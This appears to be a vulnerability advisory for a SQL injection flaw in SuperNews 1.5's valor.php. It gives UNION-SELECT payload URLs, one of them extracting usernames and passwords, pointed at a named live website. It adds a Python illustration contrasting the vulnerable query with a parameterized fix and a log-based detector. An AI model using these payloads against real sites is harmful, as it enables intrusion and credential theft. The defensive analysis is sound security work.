Vendor: SuperNews
By: p3s0k!
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: SuperNews
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:supernews:supernews:1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
SuperNews 1.5 SQL Injection in valor.php
SuperNews 1.5 is vulnerable to SQL injection in the 'valor.php' script: the 'noticia' request parameter is used in a database query without sanitization, so an attacker can read from the database and extract sensitive information. An example of the vulnerable URL is http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]. A live demo of the exploit can be found at http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5-- and http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--.
Mitigation:
The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.
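The following is an added illustration of the mitigation above, not code from SuperNews or from the advisory author. It uses an in-memory SQLite database as a stand-in for the application's backend (the `noticias` table and its columns are assumptions; the `login` table with `user` and `pass` columns is taken from the demo URL), shows the flawed string-concatenation pattern beside a validated, parameterized query, and adds a small check that flags requests to `valor.php` whose `noticia` value is not a plain integer, the kind of rule a defender would run over web server access logs (the log lines are constructed).

```python
import re
import sqlite3

# Constructed stand-in for the SuperNews database (schema is an assumption).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE noticias (id INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE login (user TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO noticias VALUES (?, ?, ?)",
        [(1, "First story", "Body text one"), (2, "Second story", "Body text two")],
    )
    # Constructed credential row; it exists only to show what leaks.
    conn.execute("INSERT INTO login VALUES (?, ?)", ("admin", "constructed-secret"))
    conn.commit()
    return conn


def fetch_news_vulnerable(conn, noticia):
    """Mirrors the flaw: the request parameter is concatenated into SQL,
    so the caller controls the query's structure, not just a value."""
    sql = "SELECT id, title, body FROM noticias WHERE id = " + noticia
    return conn.execute(sql).fetchall()


def is_valid_noticia(value):
    """Whitelist check: an article id must be a plain decimal integer."""
    return re.fullmatch(r"\d+", value) is not None


def fetch_news_fixed(conn, noticia):
    """Validate the input, then bind it as a parameter. The database driver
    sends the value separately from the SQL text, so it can never be
    interpreted as part of the query."""
    if not is_valid_noticia(noticia):
        return []
    return conn.execute(
        "SELECT id, title, body FROM noticias WHERE id = ?", (int(noticia),)
    ).fetchall()


# Constructed access-log lines in common log format.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2009:12:00:00 +0000] "GET /noticias/valor.php?noticia=12 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Mar/2009:12:00:07 +0000] "GET /noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Mar/2009:12:00:09 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_suspicious_requests(log_lines):
    """Return log lines where valor.php was requested with a 'noticia'
    value that is not a plain integer. Same whitelist as the fix, applied
    to logs for detection instead of to the request for prevention."""
    from urllib.parse import parse_qs, urlsplit

    flagged = []
    for line in log_lines:
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/valor.php"):
            continue
        values = parse_qs(url.query, keep_blank_values=True).get("noticia", [])
        if any(not is_valid_noticia(v) for v in values):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    db = build_db()
    # Constructed payload of the same shape as the advisory's demo URL.
    payload = "-1 union select user, pass, 0 from login"
    print("vulnerable:", fetch_news_vulnerable(db, payload))  # leaks the login row
    print("fixed:     ", fetch_news_fixed(db, payload))       # rejected, returns []
    for line in flag_suspicious_requests(SAMPLE_LOG):
        print("flagged:", line)
```

The whitelist is deliberately strict: an article id has exactly one legitimate shape, so anything else is rejected before a query is built, and the same predicate serves as a cheap detection rule over historical logs.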